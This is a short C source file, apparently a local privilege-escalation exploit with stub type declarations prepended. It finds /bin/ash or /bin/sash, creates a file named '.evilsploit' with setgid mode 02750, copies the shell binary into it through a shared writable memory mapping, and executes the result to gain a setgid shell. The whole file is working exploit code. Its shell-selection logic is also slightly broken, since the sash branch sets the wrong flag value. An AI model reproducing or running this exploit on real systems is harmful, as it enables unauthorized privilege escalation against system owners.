
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int MAP_SHARED ;
 int O_CREAT ;
 int O_EXCL ;
 int O_RDONLY ;
 int O_RDWR ;
 int PROT_EXEC ;
 int PROT_WRITE ;
 int close (int) ;
 int execv (char*,int *) ;
 int exit (int) ;
 int free (char*) ;
 int ftruncate (int,int) ;
 char* malloc (int) ;
 int memcpy (char*,char*,int) ;
 char* mmap (int *,int,int,int ,int,int ) ;
 int munmap (char*,int) ;
 int open (char*,int,...) ;
 int printf (char*,...) ;
 scalar_t__ read (int,char*,int) ;
 scalar_t__ stat (char*,char*) ;

int main(int argc, char *argv[])
{
char *buf=malloc(3096*1024);
int a,len;
int fd,fd1;
char *buf1;
int shell=0;


if (stat("/bin/ash",buf)==0)
{
    printf("ash shell found!\n");
    shell=1;
}

if (shell==0) if (stat("/bin/sash",buf)==0)
{
    printf("sash shell found!\n");
    shell=1;
}

if (shell==0)
{
    printf("no suitable shell found (one that does not drop sgid permissions) :(\n");
    exit(2);
}


len=0;
if (shell==1) fd=open("/bin/ash",O_RDONLY);
if (shell==2) fd=open("/bin/sash",O_RDONLY);

while (read(fd,buf+len,1)) len++;

printf("size=%d\n",len);
fd1=open(".evilsploit",O_RDWR | O_CREAT | O_EXCL, 02750);
ftruncate(fd1, len);
buf1 = mmap(((void*)0), len, PROT_WRITE | PROT_EXEC, MAP_SHARED, fd1, 0);
memcpy(buf1,buf,len);
munmap(buf1,len);
close(fd1);close(fd);
free(buf);
printf("We're evil evil evil!\n\n");
execv(".evilsploit", ((void*)0));
}
